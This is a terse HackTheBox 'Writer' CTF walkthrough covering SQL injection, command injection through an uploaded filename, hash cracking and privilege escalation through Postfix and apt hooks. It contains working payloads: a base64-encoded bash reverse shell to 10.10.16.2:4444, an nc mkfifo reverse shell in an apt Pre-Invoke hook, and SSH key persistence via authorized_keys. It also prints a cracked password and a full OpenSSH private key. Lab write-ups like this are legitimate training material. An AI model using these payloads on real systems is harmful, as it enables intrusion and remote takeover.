HackTheBox - Writer
Morten Hansen • January 30, 2022
Writer
NMAP Smb ports are open browser-ports are open
Gobuster Finds sites like static and aministrative
SQLMAP find username, hash and also reads files. Lets ut read source code and how the site source code looks like.
<ip>/administrative lets ut log in and edit blogposts
upload a file with name.
shell.jpg;`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4yLzQ0NDQgMD4mMQo=|base64 -d|bash`;
Payload = /bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.16.2/4444 0>&1"
then edit post again and click save, while intercepting it with burpsuite. Edit the image-url to contain direct path to our file like:
file:///var/www/writer.htb/writer/..../something.jpg; payload and forward it.
Because of the source-code we know the site is run with python and that it reads the filename in an os.system() command.
This will run as code and create a shell if listener with nc is set up. Inside the shell we look through the writer2 map and finds a hash inside the mysql-server.
pbkdf2_sha256$260000$wJO3ztk0fOlcbssnS1wJPD$bbTyCB8dYWMGYlz4dSArozTY7wcZCS7DV6l5dpuXM4A= NULL 1 kyle kyle@writer.htb 1 1 2021-05
Crack it with hashcat and we get the password marcoantonio.
Can use enum4linux to look through smb.
Try against smb, users kyle and john, ssh.
SSH worked: flag: 997b385ebdb90b8f26ff1fe8bdc9f7ae
User 2 inside load pspy64 and watch process. See it runs postfix and with group set to filter, which is ut, and user as root.
This means we can send files that will execute on the recipents home.
create an email script in tmp.
#!/usr/bin/python3
import smtplib
from email.message import EmailMessage
with smtplib.SMTP('127.0.0.1:25') as smtp_server:
message = EmailMessage()
message.set_content('Test')
message['Subject'] = "Fjas"
message['From'] = 'kyle@writer.htb'
message['To'] = 'john@writer.htb'
smtp_server.send_message(message)
smtp_server.quit()
Then edit the disclaimer file in /etc/postfix/disclaimer.
Create a bash script like:
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDjqFz8cYRIJmmhAGCEWGGvyUZdk3DRdw5uFkDHYXBCklDy/KDaNJSPpr/yc/DzdRsuDQIqE1jrrfqxZwztkSjIIg0THd/hrQ2WZh/sCE/H74CPHp0GUeB/HB6EOp8aHIHBecsK0Y1qiwiYGI5zgVeC01F3sqkHZSzHtyJRoqaHHipquwgQFYM6bprLpiiZnCk2ACw3V0bshs8J/032WUZ2cUWZNpBMlxwZXJ6OaZ4MF1abYISo4P35b5Pehza4Fx55LE+nEtc1m1kmnSqtVkPyB5f4Txv1D0nG2VH/sEpE6W4ern4ajH01p05JjUHw01mJObeGfVGoaPf5pCBSSNolENLbhzBBmnOaWAMfGJo88PP9YRuB6vc29Q95UFZEJX2+p26LAJFsphJ04w0YapAisBCtFp++ruRi0NvkBKSlI5WQoYdIIMLLRQp4WhKPkdUTEj3yjdflFalHnIEh0ryc8aVahBvVmBBGHLrEQKlyjHxDg2YDtGcZQEu6pm8a5XU= kali@kali" >> /home/john/.ssh/authorized_keys
Then fetch his id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
SUDO
-rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 31K May 26 11:50 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
Group has access to /etc/apt/apt.conf.d
pspy64 shows us that apt update runs regulary and therefore by adding
echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.2 4444 >/tmp/f"};' > pwn
We can set up a listener and get a reverse shell because of cronjobs every 2 minutes.